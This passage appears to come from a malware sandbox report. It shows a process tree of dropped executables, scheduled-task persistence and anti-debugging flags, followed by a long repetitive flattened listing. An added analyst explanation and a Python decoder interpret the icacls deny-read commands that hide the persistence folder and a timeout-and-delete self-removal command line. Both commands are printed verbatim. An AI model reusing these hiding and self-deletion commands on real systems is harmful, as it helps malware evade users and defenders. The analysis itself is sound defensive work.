    cmdline: regsvr32 /s C:\Users\Admin\AppData\Local\Temp\F877.dll
    - Loads dropped DLL

[1] C:\Users\Admin\AppData\Local\Temp\FAC9.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\FAC9.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[1] C:\Users\Admin\AppData\Local\Temp\101.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\101.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[1] C:\Users\Admin\AppData\Local\Temp\630.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\630.exe
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks processor information in registry
    [2] C:\ProgramData\cupd.exe
        cmdline: "C:\ProgramData\cupd.exe"
        - Executes dropped EXE
        - Checks whether UAC is enabled
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        [3] C:\Windows\SysWOW64\cmd.exe
            cmdline: C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41" /inheritance:e /deny "Admin:(R,REA,RA,RD)"
            [4] C:\Windows\SysWOW64\icacls.exe
                cmdline: icacls "C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"
                - Modifies file permissions
            [4] C:\Windows\SysWOW64\icacls.exe
                cmdline: icacls "C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"
                - Modifies file permissions
            [4] C:\Windows\SysWOW64\icacls.exe
                cmdline: icacls "C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41" /inheritance:e /deny "Admin:(R,REA,RA,RD)"
                - Modifies file permissions
    [2] C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\630.exe" & exit
        [3] C:\Windows\SysWOW64\timeout.exe
            cmdline: timeout /t 5
            - Delays execution with timeout.exe
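The cupd.exe branch above is a self-protection step: three icacls runs add Deny ACEs for Everyone (S-1-1-0), ANONYMOUS LOGON (S-1-5-7) and the current user on the directory under AppData\Roaming where sisbkup.exe is dropped (the taskeng.exe entry below launches it from there), each removing R, REA, RA and RD, that is every read and list right, while /inheritance:e keeps the ACEs propagating to the files inside. The second cmd.exe child of 630.exe is the usual self-deletion: wait five seconds for the parent to exit, then `del /f /q` its image. The Python below is an added example, not part of the report: it decodes those command lines (copied from the tree) into structured findings. The SID and rights tables, the "profile directory" heuristic and the finding wording are the example's own.

```python
"""Decode icacls Deny-ACE self-protection and timeout/del self-deletion from a process tree.

Added example, not part of the sandbox report. The command lines are copied from
the report (cupd.exe's icacls children and 630.exe's cmd.exe child); the SID and
rights tables and the checks are this example's own.
"""
import re
from typing import Dict, List, Optional

PERSIST_DIR = (r'C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources'
               r'_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41')
SAMPLE_CMDLINES = [
    f'icacls "{PERSIST_DIR}" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"',
    f'icacls "{PERSIST_DIR}" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"',
    f'icacls "{PERSIST_DIR}" /inheritance:e /deny "Admin:(R,REA,RA,RD)"',
    r'"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\630.exe" & exit',
]
PARENT_IMAGE = r'C:\Users\Admin\AppData\Local\Temp\630.exe'   # the process that spawned that cmd.exe

WELL_KNOWN_SIDS = {'S-1-1-0': 'Everyone', 'S-1-5-7': 'ANONYMOUS LOGON'}
ICACLS_RIGHTS = {'R': 'generic read', 'REA': 'read extended attributes',
                 'RA': 'read attributes', 'RD': 'read data / list directory'}
ICACLS_DENY = re.compile(
    r'icacls\s+"(?P<path>[^"]+)"\s+(?P<opts>.*?)/deny\s+"(?P<who>[^:"]+):\((?P<rights>[^)]*)\)"', re.I)
SELF_DELETE = re.compile(
    r'timeout\s+/t\s+(?P<delay>\d+)\s*&\s*del\s+(?P<switches>(?:/\w\s+)*)"(?P<target>[^"]+)"', re.I)


def parse_icacls_deny(cmdline: str) -> Optional[Dict[str, object]]:
    """Decode one `icacls <path> ... /deny <principal>:(rights)` command line."""
    m = ICACLS_DENY.search(cmdline)
    if not m:
        return None
    who = m.group('who')
    # icacls writes SIDs with a leading '*'; anything else is an account name.
    principal = WELL_KNOWN_SIDS.get(who[1:], who[1:]) if who.startswith('*') else who
    rights = [r.strip().upper() for r in m.group('rights').split(',') if r.strip()]
    return {
        'path': m.group('path'),
        'principal': principal,
        'rights': rights,
        'meaning': [ICACLS_RIGHTS.get(r, f'unknown right {r}') for r in rights],
        'removes_read': 'R' in rights or 'RD' in rights,
        'keeps_inheritance': '/inheritance:e' in m.group('opts').lower(),
    }


def parse_self_delete(cmdline: str, parent_image: str) -> Optional[Dict[str, object]]:
    """Decode a `timeout /t N & del ... "<file>"` line and say whether it deletes the parent."""
    m = SELF_DELETE.search(cmdline)
    if not m:
        return None
    target = m.group('target')
    return {'delay_s': int(m.group('delay')), 'target': target,
            'force': '/f' in m.group('switches').lower(),
            'deletes_parent': target.lower() == parent_image.lower()}


def assess(cmdlines: List[str], parent_image: str) -> Dict[str, object]:
    """Run both decoders over the lines and derive the findings a triage note would carry."""
    denies: List[Dict[str, object]] = []
    deletes: List[Dict[str, object]] = []
    findings: List[str] = []
    for line in cmdlines:
        d = parse_icacls_deny(line)
        if d:
            denies.append(d)
            continue
        s = parse_self_delete(line, parent_image)
        if s:
            deletes.append(s)
    # A Deny-read ACE for Everyone on a directory inside the user profile hides the dropped
    # files from the user and from anything that enumerates the directory as a normal user.
    for d in denies:
        if d['removes_read'] and d['principal'] == 'Everyone' and '\\appdata\\roaming\\' in str(d['path']).lower():
            findings.append(f"read/list denied to Everyone on profile directory {d['path']}")
    for s in deletes:
        if s['deletes_parent']:
            findings.append(f"parent image deleted after {s['delay_s']} s (self-deletion via cmd.exe)")
    return {'denies': denies, 'self_deletes': deletes, 'findings': findings}


if __name__ == '__main__':
    for line in assess(SAMPLE_CMDLINES, PARENT_IMAGE)['findings']:
        print(line)
```

Deny ACEs do not touch the owner's implicit READ_CONTROL and WRITE_DAC, so the account that created the directory can still undo this with `icacls "<dir>" /reset /T`, and an administrator can take ownership first; the dropped files are also still readable from a SYSTEM-level collection agent, which is what most EDR file collection uses.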
[1] C:\Windows\system32\taskeng.exe
    cmdline: taskeng.exe {647FF540-8865-4C26-A0E7-9036F3F3C0BF} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
    (taskeng.exe is the Task Scheduler engine for the Admin session; every child below is launched by a scheduled task, which is the persistence for both sisbkup.exe and the SmokeLoader copies iuehjsa and jjehjsa)
    [2] C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        cmdline: C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        - Executes dropped EXE
        - Suspicious use of NtSetInformationThreadHideFromDebugger
    [2] C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        cmdline: C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        - Executes dropped EXE
        - Suspicious use of NtSetInformationThreadHideFromDebugger
    [2] C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        cmdline: C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        - Executes dropped EXE
    [2] C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        cmdline: C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        - Executes dropped EXE
        - Suspicious use of NtSetInformationThreadHideFromDebugger
    [2] C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        cmdline: C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        - Executes dropped EXE
        - Suspicious use of NtSetInformationThreadHideFromDebugger
    [2] C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        cmdline: C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        - Executes dropped EXE
        - Checks BIOS information in registry
        - Suspicious use of NtSetInformationThreadHideFromDebugger
    [2] C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        cmdline: C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        - Executes dropped EXE
        - Checks BIOS information in registry
        - Suspicious use of NtSetInformationThreadHideFromDebugger
    [2] C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        cmdline: C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        - Executes dropped EXE
        - Suspicious use of NtSetInformationThreadHideFromDebugger
    [2] C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        cmdline: C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        - Executes dropped EXE
        - Checks BIOS information in registry
        - Suspicious use of NtSetInformationThreadHideFromDebugger
    [2] C:\Users\Admin\AppData\Roaming\iuehjsa
        cmdline: C:\Users\Admin\AppData\Roaming\iuehjsa
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        [3] C:\Users\Admin\AppData\Roaming\iuehjsa
            cmdline: C:\Users\Admin\AppData\Roaming\iuehjsa
            - Executes dropped EXE
            - Suspicious behavior: MapViewOfSection
    [2] C:\Users\Admin\AppData\Roaming\jjehjsa
        cmdline: C:\Users\Admin\AppData\Roaming\jjehjsa
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious behavior: MapViewOfSection
    [2] C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        cmdline: C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        - Executes dropped EXE
        - Suspicious use of NtSetInformationThreadHideFromDebugger
    [2] C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        cmdline: C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        - Executes dropped EXE
        - Checks BIOS information in registry
        - Suspicious use of NtSetInformationThreadHideFromDebugger
    [2] C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        cmdline: C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        - Executes dropped EXE
        - Checks whether UAC is enabled
        - Suspicious use of NtSetInformationThreadHideFromDebugger
    [2] C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        cmdline: C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        - Executes dropped EXE
        - Checks whether UAC is enabled
        - Suspicious use of NtSetInformationThreadHideFromDebugger
    [2] C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        cmdline: C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        - Executes dropped EXE
        - Checks BIOS information in registry
        - Suspicious use of NtSetInformationThreadHideFromDebugger
    [2] C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        cmdline: C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        - Executes dropped EXE
        - Checks whether UAC is enabled
        - Suspicious use of NtSetInformationThreadHideFromDebugger
    [2] C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        cmdline: C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        - Executes dropped EXE
        - Suspicious use of NtSetInformationThreadHideFromDebugger
    [2] C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        cmdline: C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        - Executes dropped EXE
        - Suspicious use of NtSetInformationThreadHideFromDebugger
    [2] C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        cmdline: C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        - Executes dropped EXE
        - Checks BIOS information in registry
        - Suspicious use of NtSetInformationThreadHideFromDebugger
    [2] C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        cmdline: C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
        - Executes dropped EXE
        - Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
